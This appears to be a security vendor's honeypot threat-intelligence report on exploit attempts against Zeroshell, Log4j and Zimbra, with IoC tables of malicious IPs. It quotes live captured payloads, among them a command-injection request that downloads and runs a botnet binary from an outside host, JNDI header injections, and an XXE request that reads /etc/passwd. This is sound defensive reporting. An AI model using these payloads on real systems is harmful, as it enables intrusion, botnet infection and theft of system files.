These past two weeks, international TEHTRIS honeypots got relentlessly hit again by suspected malicious activities. The honeypots located in Southeast America, in South and Northeast Asia Pacific and in Western Europe were the most targeted. Here is an extract of some of the attack attempts that were detected.
Attempts to exploit CVE-2019-12725 on German and Portuguese honeypots
Two malicious IP addresses have been detected by TEHTRIS NTA performing a Zeroshell remote code execution (RCE) inbound attempt. Indeed, some of our European honeypots could have been compromised through the CVE-2019-12725 (CVSSv3 : 9,8).
The US IP 4.71.37[.]46, hosted by AS 3356 LEVEL3, performed several dozen hits on Germany and Portugal. This IP address is known from public databases identifying malicious IP addresses.
The Chinese IP 36.110.214[.]195, hosted by AS 23724 IDC, China Telecommunications Corporation, is unknown from public databases of malicious IP. This IP performed only one hit on a German honeypot.
This specific URL is the downloading action for Zero botnet.
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0
URL DECODE : “;cd /tmp;curl -O http://5.206.227[.]228/zero;sh zero;”
The address IP in pink included in the packet above, likely a C2, is a known Portuguese address for exploiting Zeroshell. It is hosted by AS 47674 Net Solutions – Consultoria Em Tecnologias De Informacao, Sociedade Unipessoal LDA.
Log4j exploit attempts on a Swedish honeypot
One of our Swedish honeypots has been the target of loads of “jndi” requests that are known for being used in attempts to exploit Log4j vulnerability on devices.
27 IP addresses performed the following headers – which was the most requested upon others:
['origin: $ {jndi:ldap://:8182/a}', 'x-api-version: $ {jndi:ldap://:8182/a}', 'x-att-deviceid: $ {jndi:ldap://:8182/a}', 'proxy-connection: $ {jndi:ldap://:8182/a}', 'prefer: $ {jndi:ldap://:8182/a}', 'accept: */*', 'upgrade-insecure-requests: $ {jndi:ldap://:8182/a}', 'warning: $ {jndi:ldap://:8182/a}', 'a-im: $ {jndi:ldap://:8182/a}', 'x-request-id: $ {jndi:ldap://:8182/a}', 'from: $ {jndi:ldap://:8182/a}', 'forwarded: $ {jndi:ldap://:8182/a}', 'access-control-request-method: $ {jndi:ldap://:8182/a}', 'dnt: $ {jndi:ldap://:8182/a}', 'cache-control: $ {jndi:ldap://:8182/a}', 'x-uidh: $ {jndi:ldap://:8182/a}', 'authorization: $ {jndi:ldap://:8182/a}', 'accept-encoding: gzip', 'x-wap-profile: $ {jndi:ldap://:8182/a}', 'access-control-request-headers: $ {jndi:ldap://:8182/a}', 'x-forwarded-proto: $ {jndi:ldap://:8182/a}', 'pragma: $ {jndi:ldap://:8182/a}', 'date: $ {jndi:ldap://:8182/a}', 'x-forwarded-host: $ {jndi:ldap://:8182/a}', 'x-correlation-id: $ {jndi:ldap://:8182/a}', 'x-requested-with: $ {jndi:ldap://:8182/a}', 'front-end-https: $ {jndi:ldap://:8182/a}', 'http2-settings: $ {jndi:ldap://:8182/a}', 'x-csrf-token: $ {jndi:ldap://:8182/a}']
Other headers performed look exactly the same except for the port number 8182 that changes in a range from 8180 to 8189.
Here are the top 10 IoCs – all known from public databases identifying malicious IPs:
IP | AS | Country |
93.91.117[.]60 | AS 47562 Fast Link Ltd | RU |
120.236.74[.]234 | AS 9808 China Mobile Communications Group Co., Ltd. | CN |
85.51.217[.]156 | AS 12479 Orange Espagne SA | ES |
118.41.204[.]72 222.103.98[.]58 | AS 4766 Korea Telecom | KR |
72.132.58[.]237 | AS 20001 TWC-20001-PACWEST | US |
178.140.136[.]178 | AS 42610 Rostelecom | RU |
223.171.91[.]144 | AS 17853 LGTELECOM | KR |
46.170.151[.]34 | AS 5617 Orange Polska Spolka Akcyjna | PL |
147.182.233[.]56 | AS 14061 DIGITALOCEAN-ASN | US |
Attempts to exploit CVE-2019-9621 on European honeypots by a Russian IP
Thanks to TEHTRIS NTA that automatically detects any anomaly in the traffic, we monitored an increase in attempts to exploit CVE-2019-9621 (CVSSv3 : 7,5) impacting Zimbra version inferior to 8.8.11 these past two weeks. Indeed, Zimbra Collaboration Suite before 8.6 patch 13, 8.7.x before 8.7.11 patch 10, and 8.8.x before 8.8.10 patch 7 or 8.8.x before 8.8.11 patch 3 allows Server-side request forgery (SSRF) and XML External Entity injection via the ProxyServlet component.
The Russian IP address 152.89.196[.]211 (AS 57523 Chang Way Technologies Co. Limited) performed hundreds of actions against all our TEHTRIS European honeypots during this second half of February. This IP identified as malicious in public databases started to attack our honeypots on the 10th of January.
Here is one example of the requests seen in NTA packet:
POST /Autodiscover/Autodiscover.xml HTTP/1.1 Host: xx.x.xxx.xx:80 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Length: 314 Content-Type: application/xml Accept-Encoding: gzip Connection: close <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"> <Request> <EMailAddress>aaaaa</EMailAddress> <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema> </Request> </Autodiscover>
The line in pink is an attempt to obtain the file/etc/passwd that notably contains the list of the users of the machine.
Attempts to exploit CVE-2019-16759 & CVE-2020-17496 on an Italian honeypot
Want to learn more on this subject?
More insights on this research issued from the alerts on our worldwide honeypots network.
Subscribe to our bi-monthly threat intelligence newsletter
Hardworking Bulgarian threat actors?
Want to learn more on this subject?
More insights on this research issued from the alerts on our worldwide honeypots network.
Subscribe to our bi-monthly threat intelligence newsletter
Masscan, an open-source scanner widely used
Want to learn more on this subject?
More insights on this research issued from the alerts on our worldwide honeypots network.
Subscribe to our bi-monthly threat intelligence newsletter
Information remain TEHTRIS sole property and reproduction is forbidden
TEHTRIS is and remains sole property rights owner of the information provided herein. Any copy, modification, derivative work, associated document, as well as every intellectual property right, is and must remain TEHTRIS’ sole and exclusive property. TEHTRIS authorizes the user to access for read use only. Except as expressly provided above, nothing contained herein will be construed as conferring any license or right under any TEHTRIS’ copyright.
No warranty and liability
TEHTRIS will not be held liable for any use, improper or incorrect use of the information described and/or contained herein and assume no responsibility for anyone’s use of the information. Although every effort has been made to provide complete and accurate information, TEHTRIS makes no warranty, expressed or implied regarding accuracy, adequacy, completeness, legality, reliability, or usefulness of any information provided herein. This disclaimer applies to both isolated and aggregated uses of the information.